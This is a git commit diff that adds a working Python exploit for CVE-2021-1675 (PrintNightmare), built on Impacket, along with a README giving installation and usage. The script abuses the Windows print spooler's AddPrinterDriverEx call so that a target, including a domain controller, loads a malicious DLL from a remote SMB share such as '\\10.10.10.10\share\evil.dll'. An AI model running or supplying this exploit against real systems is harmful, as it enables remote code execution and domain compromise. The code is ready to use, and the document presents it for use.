parent
a18547eef4
commit
b94fddca41
@ -0,0 +1,126 @@ |
|||||||
|
#!/usr/bin/python3 |
||||||
|
from impacket.dcerpc.v5 import rprn |
||||||
|
from impacket.dcerpc.v5 import transport |
||||||
|
import argparse |
||||||
|
import sys |
||||||
|
|
||||||
|
|
||||||
|
def connect(username, password, domain, lmhash, nthash, address, port): |
||||||
|
binding = r'ncacn_np:{0}[\PIPE\spoolss]'.format(address) |
||||||
|
rpctransport = transport.DCERPCTransportFactory(binding) |
||||||
|
|
||||||
|
rpctransport.set_dport(port) |
||||||
|
rpctransport.setRemoteHost(address) |
||||||
|
|
||||||
|
if hasattr(rpctransport, 'set_credentials'): |
||||||
|
# This method exists only for selected protocol sequences. |
||||||
|
rpctransport.set_credentials(username, password, domain, lmhash, nthash) |
||||||
|
|
||||||
|
print("[*] Connecting to {0}".format(binding)) |
||||||
|
try: |
||||||
|
dce = rpctransport.get_dce_rpc() |
||||||
|
dce.connect() |
||||||
|
dce.bind(rprn.MSRPC_UUID_RPRN) |
||||||
|
except: |
||||||
|
print("[-] Connection Failed") |
||||||
|
sys.exit(1) |
||||||
|
print("[+] Bind OK") |
||||||
|
return dce |
||||||
|
|
||||||
|
|
||||||
|
def main(username, password, domain, lmhash, nthash, address, port, share): |
||||||
|
#connect |
||||||
|
dce = connect(username, password, domain, lmhash, nthash, address, port) |
||||||
|
|
||||||
|
#build DRIVER_CONTAINER package |
||||||
|
container_info = rprn.DRIVER_CONTAINER() |
||||||
|
container_info['Level'] = 2 |
||||||
|
container_info['DriverInfo']['tag'] = 2 |
||||||
|
container_info['DriverInfo']['Level2']['cVersion'] = 3 |
||||||
|
container_info['DriverInfo']['Level2']['pName'] = "1234\x00" |
||||||
|
container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00" |
||||||
|
container_info['DriverInfo']['Level2']['pDriverPath'] = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\x00" |
||||||
|
container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share) |
||||||
|
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00" |
||||||
|
|
||||||
|
|
||||||
|
flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000 |
||||||
|
handle = "\\\\{0}\x00".format(address) |
||||||
|
filename = share.split("\\")[-1] |
||||||
|
|
||||||
|
print("[*] Uploading {0}".format(share)) |
||||||
|
|
||||||
|
#stage 0 |
||||||
|
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) |
||||||
|
print("[*] Stage0: {0}".format(resp['ErrorCode'])) |
||||||
|
|
||||||
|
#stage 1 |
||||||
|
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\{0}\x00".format(filename) |
||||||
|
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) |
||||||
|
print("[*] Stage1: {0}".format(resp['ErrorCode'])) |
||||||
|
|
||||||
|
#stage 2 |
||||||
|
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\2\\{0}\x00".format(filename) |
||||||
|
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) |
||||||
|
print("[*] Stage2: {0}".format(resp['ErrorCode'])) |
||||||
|
|
||||||
|
#stage 3 |
||||||
|
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\3\\{0}\x00".format(filename) |
||||||
|
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) |
||||||
|
print("[*] Stage3: {0}".format(resp['ErrorCode'])) |
||||||
|
|
||||||
|
if (resp['ErrorCode'] == 0): |
||||||
|
print("[+] Exploit Completed") |
||||||
|
else: |
||||||
|
print("[-] Not Completed") |
||||||
|
|
||||||
|
|
||||||
|
if __name__ == '__main__': |
||||||
|
parser = argparse.ArgumentParser(add_help = True, description = "CVE-2021-1675 implementation.",formatter_class=argparse.RawDescriptionHelpFormatter,epilog=""" |
||||||
|
Example; |
||||||
|
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll' |
||||||
|
""") |
||||||
|
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>') |
||||||
|
parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'') |
||||||
|
group = parser.add_argument_group('authentication') |
||||||
|
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') |
||||||
|
group = parser.add_argument_group('connection') |
||||||
|
group.add_argument('-target-ip', action='store', metavar="ip address", |
||||||
|
help='IP Address of the target machine. If omitted it will use whatever was specified as target. ' |
||||||
|
'This is useful when target is the NetBIOS name and you cannot resolve it') |
||||||
|
group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar="destination port", |
||||||
|
help='Destination port to connect to SMB Server') |
||||||
|
|
||||||
|
if len(sys.argv)==1: |
||||||
|
parser.print_help() |
||||||
|
sys.exit(1) |
||||||
|
|
||||||
|
options = parser.parse_args() |
||||||
|
|
||||||
|
import re |
||||||
|
domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match( |
||||||
|
options.target).groups('') |
||||||
|
|
||||||
|
#In case the password contains '@' |
||||||
|
if '@' in address: |
||||||
|
password = password + '@' + address.rpartition('@')[0] |
||||||
|
address = address.rpartition('@')[2] |
||||||
|
|
||||||
|
if options.target_ip is None: |
||||||
|
options.target_ip = address |
||||||
|
|
||||||
|
if domain is None: |
||||||
|
domain = '' |
||||||
|
|
||||||
|
if password == '' and username != '' and options.hashes is None: |
||||||
|
from getpass import getpass |
||||||
|
password = getpass("Password:") |
||||||
|
|
||||||
|
if options.hashes is not None: |
||||||
|
lmhash, nthash = options.hashes.split(':') |
||||||
|
else: |
||||||
|
lmhash = '' |
||||||
|
nthash = '' |
||||||
|
|
||||||
|
|
||||||
|
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share) |
After Width: | Height: | Size: 363 KiB |
@ -1,2 +1,49 @@ |
|||||||
# CVE-2021-1675 |
# CVE-2021-1675 |
||||||
Impacket implemenation of CVE-2021-1675 |
|
||||||
|
Impacket implementation of the [PrintNightmare ](https://github.com/afwu/PrintNightmare) PoC originally created by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370) |
||||||
|
|
||||||
|
Tested on a fully patched 2019 Domain Controller |
||||||
|
|
||||||
|
Execute malicious DLL's remote or locally |
||||||
|
|
||||||
|
![](Images/poc.png) |
||||||
|
|
||||||
|
### Installation |
||||||
|
|
||||||
|
Before running the exploit you need to install my version of Impacket and after that you're gucci |
||||||
|
|
||||||
|
``` |
||||||
|
git clone https://github.com/cube0x0/impacket |
||||||
|
cd impacket |
||||||
|
python3 ./setup.py install |
||||||
|
``` |
||||||
|
|
||||||
|
#### CVE-2021-1675.py |
||||||
|
|
||||||
|
``` |
||||||
|
usage: CVE-2021-1675.py [-h] [-hashes LMHASH:NTHASH] [-target-ip ip address] [-port [destination port]] target share |
||||||
|
|
||||||
|
CVE-2021-1675 implementation. |
||||||
|
|
||||||
|
positional arguments: |
||||||
|
target [[domain/]username[:password]@]<targetName or address> |
||||||
|
share Path to DLL. Example '\\10.10.10.10\share\evil.dll' |
||||||
|
|
||||||
|
optional arguments: |
||||||
|
-h, --help show this help message and exit |
||||||
|
|
||||||
|
authentication: |
||||||
|
-hashes LMHASH:NTHASH |
||||||
|
NTLM hashes, format is LMHASH:NTHASH |
||||||
|
|
||||||
|
connection: |
||||||
|
-target-ip ip address |
||||||
|
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name |
||||||
|
and you cannot resolve it |
||||||
|
-port [destination port] |
||||||
|
Destination port to connect to SMB Server |
||||||
|
|
||||||
|
Example; |
||||||
|
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll' |
||||||
|
``` |
||||||
|
|
||||||
|
Loading…
Reference in new issue